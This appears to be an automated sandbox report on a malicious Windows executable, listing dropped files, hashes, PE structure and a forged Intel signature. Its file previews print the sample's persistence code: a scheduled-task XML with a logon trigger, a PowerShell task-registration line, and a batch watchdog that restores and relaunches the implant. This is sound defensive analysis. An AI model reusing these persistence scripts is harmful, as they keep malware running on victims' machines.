Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 1360
Entropy (8bit): 5.4072854279441245
Encrypted: false
SSDEEP: 24:3pWSKco4KmZjKbmOIKod6emN1s4RPQoU99tXt/NK3R88bJ02iaEW3b5:ZWSU4xympjms4RIoU99tlNWR832qab5
MD5: 6D0F607797C1AB216DCAB3AE8135D859
SHA1: 3ECA594EB3134F6570E9D2D8D09A7579B3C82356
SHA-256: EC517F5926C441982D43745F566967E4C190D022028BE6C80B93E244293538BF
SHA-512: 5336F98D40BFA67ADCA7BB5568F0B5190A52427ADE377B0E0A525A5DF85F36F4D2CD330A5F02CE2238E90A8C695395EA31F702EB590E9C77E92156D83E7C7CC6
Malicious: false
Preview: @...e...........................................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

Process: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
File Type: XML 1.0 document, ASCII text
Category: dropped
Size (bytes): 1893
                                                                          Entropy (8bit):5.212287775015203
                                                                          Encrypted:false
                                                                          SSDEEP:48:c55XzDl4Q2ZbXL6Q0QFdOFQOzN33O4OiDdKrKsTLXbGMv:O5XzDl4Q2ZbGQhFdOFQOzBdKrKsTLXbV
                                                                          MD5:E3FB2ECD2AD10C30913339D97E0E9042
                                                                          SHA1:A004CE2B3D398312B80E2955E76BDA69EF9B7203
                                                                          SHA-256:1BD6DB55FFF870C9DF7A0AAC11B895B50F57774F20A5744E63BBC3BD40D11F28
                                                                          SHA-512:9D6F0C1E344F1DC5A0EF4CAAD86281F92A6C108E1085BACD8D6143F9C742198C2F759CA5BDFFAD4D9E40203E6B0460E84896D1C6B8B1759350452E1DE809B716
                                                                          Malicious:false
                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2006-11-10T14:29:55.5851926</Date>. <Author>Microsoft Corporation</Author>. <Description>????? AD RMS ?????????????????? Web ?????????,???????????</Description>. <URI>\AS AMD updata</URI>. <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>. </RegistrationInfo>. <Triggers>. <LogonTrigger id="06b3f632-87ad-4ac0-9737-48ea5ddbaf11">. <Enabled>true</Enabled>. <Delay>PT30S</Delay>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="AllUsers">. <GroupId>S-1-1-0</GroupId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerm
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):3900728
                                                                          Entropy (8bit):6.921777359365007
                                                                          Encrypted:false
                                                                          SSDEEP:98304:j9G9uqf+tQ+5ObxeayQwz10kfVtOpDLYAznM71B99gnImkJ:j9qfyixeVtqktjAznM7X9+ImkJ
                                                                          MD5:E6B35BB2692E704C72FAD83DE5C86E67
                                                                          SHA1:B8335960E3A92ED8C436B46FCF9D1518902D8A1B
                                                                          SHA-256:48756A865554BFBBEAF25A0DDB3B16AF44F113327BA5C01A506E37F3F584D64D
                                                                          SHA-512:B7B1F0528AE5DEE82C4A057A9D99F716AB24A05A2D832CD15BE3CFC738CA97FF0A31DEC3877A32F189C9554364F7B024AB27BED0B4B94DE6B9F4D7DD9FBF03D4
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...B.Qg...........!.....^...r...............................................`;.......;...@.........................H ".L.... ".......$..L............:.8.....8............................... ......M ............. -"..............................text...8\.......^.................. ..`.rdata...'...p...(...b..............@..@.data.........#..p....#.............@....00cfg.......`$.......#.............@..@.tls.........p$.......#.............@....rsrc....L....$..N....#.............@..@.reloc........8......L8.............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):649416
                                                                          Entropy (8bit):6.182028963232553
                                                                          Encrypted:false
                                                                          SSDEEP:12288:zohLz8nnnnntnnnnnnnnnnnnnnnxnMvnnnnPZnnnnPxnnnnnnnnqshJSLnk41mCL:zshQmC5Bz5CLgBFqGI1yi/UQeZndsqro
                                                                          MD5:0922B22053A6D5D9516EA910D34A4771
                                                                          SHA1:784D3ED35D040091AE209792E2FA8FC97EE6A071
                                                                          SHA-256:41F413DEBFE785B95D852A396AEFE1C814F3C13BDEDF85526F2DC4E83127D6CA
                                                                          SHA-512:909EC8B2C1045CC11C03C6B82B7ED6AD96BC8E93F9C98CB8A668572C84CBBCE778C12365B2B2EB547218783A830BE41458E0AE21939E99339F54921D98D944D8
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.....U..U..U]..T..U]..T..U]..T..U]..T..U...T#.U...T..U...T..U...T..U..UW.U...T..U...T..U..[U..U...T..URich..U........................PE..L......d..........".......... ....../.............@.......................... ..................................................(....@...................\..............T........................... ...@............................................tp6............b.................. ..`.tp6.a..nZ.......\...f..............@..@.tp6......... ......................@..@.tp6.........@......................@..@.tp6d...5%.......&...f.............. ...................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):799
                                                                          Entropy (8bit):5.133222805965959
                                                                          Encrypted:false
                                                                          SSDEEP:24:NFW/WilW/WvlWE3fzWcmrfZKx31SIYaYZLZ6y:NFVIVNjvzCZKx31SIYN/6y
                                                                          MD5:3B361EC9F7132332DD5FC2031ACA6305
                                                                          SHA1:3A2672F4FA8194B46BC20DA16E085DC9F26785A6
                                                                          SHA-256:740F6CE9EF39BB4728FE1C8CF21DBABACE5A79395BDF6EFEE4F56866B1318056
                                                                          SHA-512:3028C1D056A0806E3CDCBB2D2B5A737FD4C4872A1C401FB32098892F766E37EBB840E0575E4543F2F68C74FBCA8632AB74BCA229D6E4BD2F1843B666D211EE5E
                                                                          Malicious:false
                                                                          Preview:@echo off..:CheckProcess..set "ProcessName=ShellExperienceHosts.exe"..set "ProcessPath=C:\Users\Public\Bulete\program\ShellExperienceHosts.exe"..set "BackupProcessPath=C:\Users\user\AppData\Local\Temp\\backup.exe"..set "DLLPath=C:\Users\Public\Bulete\program\yyzyBase.dll"..set "BackupDLLPath=C:\Users\user\AppData\Local\Temp\\backup.dll"..if not exist "%ProcessPath%" (.. echo Process file not found, restoring from backup..... copy /Y "%BackupProcessPath%" "%ProcessPath%"..)..if not exist "%DLLPath%" (.. echo DLL file not found, restoring from backup..... copy /Y "%BackupDLLPath%" "%DLLPath%"..)..tasklist /FI "IMAGENAME eq %ProcessName%" | findstr /I "%ProcessName%" >nul..if %ERRORLEVEL% neq 0 (.. start "" "%ProcessPath%"..)..timeout /t 30 /nobreak >nul..goto CheckProcess..
                                                                          Process:C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):4
                                                                          Entropy (8bit):2.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:B:B
                                                                          MD5:27D8D40B22F812A1BA6C26F8EF7DF480
                                                                          SHA1:49C62DC250B446E0FFC4E5194EB365DA2E0CEBBD
                                                                          SHA-256:9347C0C9A9A77D1DF666D472577AFDF194993199FF30713910B6766B2BD71AA8
                                                                          SHA-512:71C1EDCA12C2B527DA2F7645333689176221546E3CAB6BC7307870EE29DA8FE324B4013BD082EECAF3E946BE1E1039968B9C1849034500A10B97D6E101C66D67
                                                                          Malicious:false
                                                                          Preview:4312
                                                                          Process:C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):151
                                                                          Entropy (8bit):4.741657013789009
                                                                          Encrypted:false
                                                                          SSDEEP:3:41Ai+PBoAwnLFsI2FIERMJyjqLWAfXIhS/ytIEFMEQVGdAn:4yi+5dwnLFsI2F5KJy0fXnMFFQhn
                                                                          MD5:AA0E1012D3B7C24FAD1BE4806756C2CF
                                                                          SHA1:FE0D130AF9105D9044FF3D657D1ABEAF0B750516
                                                                          SHA-256:FC47E1FA89397C3139D9047DC667531A9153A339F8E29AC713E518D51A995897
                                                                          SHA-512:15FAE192951747A0C71059F608700F88548F3E60BB5C708B206BF793A7E3D059A278F2058D4AC86B86781B202037401A29602EE4D6C0CBAAFF532CEF311975F4
                                                                          Malicious:true
                                                                          Preview:$xmlPath = "XML??".$taskName = "????".$xmlContent = Get-Content -Path $xmlPath | Out-String.Register-ScheduledTask -Xml $xmlContent -TaskName $taskName
                                                                          Process:C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Dec 27 07:19:27 2024, mtime=Fri Dec 27 07:19:27 2024, atime=Thu Dec 5 08:47:57 2024, length=5910912, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):1121
                                                                          Entropy (8bit):4.697816234169075
                                                                          Encrypted:false
                                                                          SSDEEP:12:8O1RUlGI+CICHqX/iXaACmqFT8zKp6I6bjAEOQdStGi6yavPdxo44t2YZ/elFlSd:8lGRa7K/6vAEHSx6/vlx3qyFm
                                                                          MD5:32CB467F57CA900340DA87FC8E906578
                                                                          SHA1:B2E7A5BDFC7386F69E0C9F0EC3D6A5CA02C69F84
                                                                          SHA-256:4C8A7D6990BDDF9A883B63543C9AB4EB7672075814A05282D5F5306C291D3593
                                                                          SHA-512:EDB833A6FAFC0B7B80494155EF9EFE71D4EA27A6C919AC9E9B523FCD2F95D57BED653EC698407453B5D3085BA360E82A6E28E3DFD84D573237E070DB8E7C8364
                                                                          Malicious:false
Preview: L..................F.... .......8X...0..8X...xS..F...1Z..........................P.O. .:i.....+00.../C:\...................x.1.....CW;^..Users.d......OwH.YmB....................:.....K...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....|.1......YnB..Public..f......O.I.YoB....+...............<......2v.P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.....T.1......YnB..Bulete..>......YnB.YnB............................:.B.u.l.e.t.e.......2..1Z..Y.M .WPS_LI~1.EXE..j......YnB.YnB.... .....................q"..w.p.s._.l.i.d...l.i.d.-.s.8.H.D.M.q.E.8.a.6.X.y...e.x.e.......b...............-.......a.............g\.....C:\Users\Public\Bulete\wps_lid.lid-s8HDMqE8a6Xy.exe..0.....\.....\.P.u.b.l.i.c.\.B.u.l.e.t.e.\.w.p.s._.l.i.d...l.i.d.-.s.8.H.D.M.q.E.8.a.6.X.y...e.x.e..........v..*.cM.jVD.Es.!...`.......X.......813848...........hT..CrF.f4... .~T..b...,.......hT..CrF.f4... .~T..b...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.
Process: C:\Windows\SysWOW64\timeout.exe
File Type: ASCII text, with CRLF line terminators, with overstriking
Category: dropped
Size (bytes): 134
Entropy (8bit): 4.078552106113438
Encrypted: false
SSDEEP: 3:hYFRZARcWmFsFJQZ/ctXvY/4to/9uF8cttEfYhnQUqg2Htm:hYFRamFSQZ0lv5y/9JctESnQUq3tm
MD5: 5410B2A3CD92E086498679B0501DEDDD
SHA1: 6C1EA996851C4ADF951301E0614F745718879914
SHA-256: 0C938B9F17B65DC2A1C8BF357CB8EBC4DCCCFEFA66C35C9FBA3D57FAE4FD77D5
SHA-512: 4FE30CD3C50771A995DE8EFD81A5613D2AC3F589DE22FBD316F13905C59393CFBC091F8430B6427803B8087035B34F7628B7E36CE70FD3F486FAA38CA5F5384D
Malicious: false
Preview: ..Waiting for 30 seconds, press CTRL+C to quit .....29..28..27..26..25..24..23..22..21..20..19..18..17..16..15..14..13..12..11..10.. 9
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.931775445441287
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: S1Rv3ioghk.exe
File size: 4'477'216 bytes
MD5: fd7ec2c34e2593e4d606e0a9d37e257a
SHA1: aac4d5282290c1da30acbf00703c02c5e6ee4b6e
SHA256: 17a742ca6bd9bd88de4f83074d17d1f74faec1b04d177bef710229c77d9e6e21
SHA512: 9cdedf8b49e2eccf54719ca8db1cf462bef874a1a5c0c5b7cb91864da3dcce2971b2318effb7c0c7d126ec26bb801e524e2c4f477087e708670970a744c3b470
SSDEEP: 98304:1pe1S1L/GhYOiYjZJyY0HfyGADpjpB/t7Q/vrJpB8yG+W:1p7dOeFYjXmWZpA/vrJpKy7W
TLSH: 0F2622D83394E369E6B19530E6A356F41972AD9AE920F47BD2643F0C2DB4F04A17432F
File Content Preview: MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...~.&L.....................h...............0....@.................................A........................................P...........,............C.8..
Icon Hash: 3f43e872666cd520
Entrypoint: 0x411def
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:
Time Stamp: 0x4C26F87E [Sun Jun 27 07:06:38 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: b5a014d7eeb4c2042897567e1288a095
Signature Valid: false
Signature Issuer: CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232
Not Before, Not After
• 13/03/2023 00:00:00 12/03/2024 23:59:59
Subject Chain
• CN=Intel Corporation, O=Intel Corporation, S=California, C=US
Version: 3
Thumbprint MD5: D33A22FCE39A6199A642B44AD0FC8B60
Thumbprint SHA-1: 2F395649AEAD9175BBF761901050546E7A10AA0C
Thumbprint SHA-256: CDE983898016FC3807D26E1B770A5516C52D855BCB523705C0826B00267D58A2
Serial: 00A90FA001692A0CC5CCF51B5821F2952C
Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 00414C50h
push 00411F80h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [00413184h]
pop ecx
or dword ptr [00419924h], FFFFFFFFh
or dword ptr [00419928h], FFFFFFFFh
call dword ptr [00413188h]
mov ecx, dword ptr [0041791Ch]
mov dword ptr [eax], ecx
call dword ptr [0041318Ch]
mov ecx, dword ptr [00417918h]
mov dword ptr [eax], ecx
mov eax, dword ptr [00413190h]
mov eax, dword ptr [eax]
mov dword ptr [00419920h], eax
call 00007F94E47D4992h
cmp dword ptr [00417710h], ebx
jne 00007F94E47D487Eh
push 00411F78h
call dword ptr [00413194h]
pop ecx
call 00007F94E47D4964h
push 00417048h
push 00417044h
call 00007F94E47D494Fh
mov eax, dword ptr [00417914h]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [00417910h]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [0041319Ch]
push 00417040h
push 00417000h
call 00007F94E47D491Ch
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x150dc | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1a000 | 0x52cfc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x439fe8 | 0xb138 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x13000 | 0x310 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x11317 | 0x11400 | 797279c5ab1a163aed1f2a528f9fe3ce | False | 0.6174988677536232 | data | 6.576987441854239 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x13000 | 0x30ea | 0x3200 | 1359639b02bcb8f0a8743e6ead1c0030 | False | 0.43828125 | data | 5.549434098115495 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x17000 | 0x292c | 0x800 | 9415c9c8dea3245d6d73c23393e27d8e | False | 0.431640625 | data | 3.6583182363171756 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x1a000 | 0x52cfc | 0x52e00 | 245e0061051191c28806833062f9d410 | False | 0.1521434294871795 | data | 4.9556234886773645 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x1c3c0 | 0x198 | PNG image data, 210 x 143, 4-bit colormap, non-interlaced | Chinese | China | 0.8406862745098039
RT_CURSOR | 0x1c558 | 0x134 | Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001" | | | 0.35714285714285715
RT_CURSOR | 0x1c68c | 0x134 | data | | | 0.44155844155844154
RT_CURSOR | 0x1c7c0 | 0x134 | Targa image data - Mono 64 x 65536 x 1 +32 "\001" | | | 0.40584415584415584
RT_CURSOR | 0x1c8f4 | 0x134 | Targa image data 64 x 65536 x 1 +32 "\001" | | | 0.5746753246753247
RT_CURSOR | 0x1ca28 | 0x134 | AmigaOS bitmap font "(", fc_YSize 4294966287, 3840 elements, 2nd "\376\017\340\377\377\017\341\377\377\217\343\377\377\337\367\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd | | | 0.4642857142857143
RT_CURSOR | 0x1cb5c | 0x134 | Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001" | | | 0.32142857142857145
RT_CURSOR | 0x1cc90 | 0x134 | data | | | 0.3409090909090909
RT_CURSOR | 0x1cdc4 | 0x134 | Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001" | | | 0.4837662337662338
RT_CURSOR | 0x1cef8 | 0x134 | AmigaOS bitmap font "(", fc_YSize 4294935297, 3840 elements, 2nd "\200\003\377\201\300\007\377\203\300\017\377\003\340\037\376\007\360\037\370\017\370\003\300\037\374", 3rd | | | 0.711038961038961
RT_CURSOR | 0x1d02c | 0x134 | data | | | 0.6038961038961039
RT_CURSOR | 0x1d160 | 0x134 | Targa image data 64 x 65536 x 1 +32 "\001" | | | 0.36038961038961037
RT_CURSOR | 0x1d294 | 0x134 | Targa image data 64 x 65536 x 1 +32 "\001" | | | 0.3474025974025974
RT_CURSOR | 0x1d3c8 | 0x134 | AmigaOS bitmap font "(", fc_YSize 4294967040, 3840 elements, 2nd "\376", 3rd | | | 0.4383116883116883
RT_CURSOR | 0x1d4fc | 0x134 | Targa image data - RLE 64 x 65536 x 1 +32 "\001" | | | 0.35064935064935066
RT_CURSOR | 0x1d630 | 0x134 | Targa image data - Mono 64 x 65536 x 1 +32 "\001" | | | 0.4512987012987013
RT_CURSOR | 0x1d764 | 0x134 | Targa image data - Mono 64 x 65536 x 1 +32 "\001" | | | 0.39285714285714285
RT_CURSOR | 0x1d898 | 0x134 | Targa image data - Mono 64 x 65536 x 1 +32 "\001" | | | 0.4967532467532468
RT_CURSOR | 0x1d9cc | 0x134 | Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001" | | | 0.32142857142857145
RT_CURSOR | 0x1db00 | 0x134 | data | | | 0.4805194805194805
RT_CURSOR | 0x1dc34 | 0x134 | data | | | 0.38311688311688313
RT_CURSOR | 0x1dd68 | 0x134 | data | | | 0.36038961038961037
RT_CURSOR | 0x1de9c | 0x134 | data | | | 0.4090909090909091
RT_CURSOR | 0x1dfd0 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | | | 0.4967532467532468
RT_BITMAP | 0x1e104 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.43103448275862066
RT_BITMAP | 0x1e2d4 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5064655172413793
RT_BITMAP | 0x1e4a4 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39655172413793105
RT_BITMAP | 0x1e674 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5344827586206896
RT_BITMAP | 0x1e844 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39655172413793105
RT_BITMAP | 0x1ea14 | 0xc0 | Device independent bitmap graphic, 11 x 11 x 4, image size 88 | Russian | Russia | 0.40625
RT_BITMAP | 0x1ead4 | 0xc0 | Device independent bitmap graphic, 11 x 11 x 4, image size 88 | Russian | Russia | 0.40625
RT_BITMAP | 0x1eb94 | 0xa8 | Device independent bitmap graphic, 10 x 8 x 4, image size 64 | | | 0.49404761904761907
RT_BITMAP | 0x1ec3c | 0x134 | Device independent bitmap graphic, 18 x 17 x 4, image size 204 | | | 0.37337662337662336
RT_BITMAP | 0x1ed70 | 0xb8 | Device independent bitmap graphic, 10 x 10 x 4, image size 80 | Russian | Russia | 0.41304347826086957
RT_BITMAP | 0x1ee28 | 0xb8 | Device independent bitmap graphic, 11 x 10 x 4, image size 80 | Russian | Russia | 0.45652173913043476
RT_BITMAP | 0x1eee0 | 0xb8 | Device independent bitmap graphic, 10 x 10 x 4, image size 80 | Russian | Russia | 0.42391304347826086
RT_BITMAP | 0x1ef98 | 0xb8 | Device independent bitmap graphic, 11 x 10 x 4, image size 80 | Russian | Russia | 0.44565217391304346
RT_BITMAP | 0x1f050 | 0x90 | Device independent bitmap graphic, 8 x 10 x 4, image size 40 | | | 0.4861111111111111
RT_BITMAP | 0x1f0e0 | 0x11c | Device independent bitmap graphic, 38 x 9 x 4, image size 180 | | | 0.4507042253521127
RT_BITMAP | 0x1f1fc | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors | | | 0.5208333333333334
RT_BITMAP | 0x1f2bc | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | | | 0.42857142857142855
RT_BITMAP | 0x1f39c | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | | | 0.4955357142857143
RT_BITMAP | 0x1f47c | 0x8c | Device independent bitmap graphic, 5 x 9 x 4, image size 36 | | | 0.5285714285714286
RT_BITMAP | 0x1f508 | 0xc8 | Device independent bitmap graphic, 12 x 12 x 4, image size 96 | Russian | Russia | 0.41
RT_BITMAP | 0x1f5d0 | 0xc8 | Device independent bitmap graphic, 12 x 12 x 4, image size 96 | Russian | Russia | 0.39
RT_BITMAP | 0x1f698 | 0x8c | Device independent bitmap graphic, 5 x 9 x 4, image size 36 | | | 0.45
RT_BITMAP | 0x1f724 | 0x238 | Device independent bitmap graphic, 29 x 29 x 4, image size 464 | | | 0.25
RT_BITMAP | 0x1f95c | 0x238 | Device independent bitmap graphic, 29 x 29 x 4, image size 464 | | | 0.20950704225352113
RT_BITMAP | 0x1fb94 | 0x8c | Device independent bitmap graphic, 5 x 9 x 4, image size 36 | | | 0.5071428571428571
RT_BITMAP | 0x1fc20 | 0x8c | Device independent bitmap graphic, 5 x 9 x 4, image size 36 | | | 0.5142857142857142
RT_BITMAP | 0x1fcac | 0x8c | Device independent bitmap graphic, 5 x 9 x 4, image size 36 | | | 0.4857142857142857
RT_BITMAP | 0x1fd38 | 0x238 | Device independent bitmap graphic, 29 x 29 x 4, image size 464 | | | 0.21654929577464788
RT_BITMAP | 0x1ff70 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | | | 0.3232758620689655
RT_BITMAP | 0x20058 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | | | 0.28448275862068967
RT_BITMAP | 0x20140 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | | | 0.2629310344827586
RT_BITMAP | 0x20228 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | | | 0.33189655172413796
RT_ICON | 0x20310 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m | | | 0.2473404255319149
RT_ICON | 0x20778 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 2835 x 2835 px/m | | | 0.15655737704918032
RT_ICON | 0x21100 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m | | | 0.12101313320825516
RT_ICON | 0x221a8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m | | | 0.07655601659751038
RT_ICON | 0x24750 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/m | | | 0.056211620217288615
RT_ICON | 0x28978 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 2835 x 2835 px/m | | | 0.03660395207063275
RT_ICON | 0x31e20 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m | | | 0.027135336566899326
RT_ICON | 0x42648 | 0x1104 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9687786960514233
RT_ICON | 0x4374c | 0x2388 | PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced | | | 0.9195250659630607
RT_DIALOG | 0x45ad4 | 0xcc | data | English | United States | 0.6911764705882353
RT_DIALOG | 0x45ba0 | 0x1b4 | data | English | United States | 0.5458715596330275
RT_STRING | 0x45d54 | 0x40 | data | English | United States | 0.609375
RT_STRING | 0x45d94 | 0x81a | data | English | United States | 0.3322082931533269
RT_STRING | 0x465b0 | 0x302 | data | English | United States | 0.4649350649350649
RT_STRING | 0x468b4 | 0x298 | data | English | United States | 0.46536144578313254
RT_STRING | 0x46b4c | 0x328 | data | English | United States | 0.4405940594059406
RT_STRING | 0x46e74 | 0xc2 | data | English | United States | 0.5721649484536082
RT_STRING | 0x46f38 | 0x3e | data | Chinese | China | 0.6935483870967742
RT_STRING | 0x46f78 | 0x5ce | data | English | United States | 0.37012113055181695
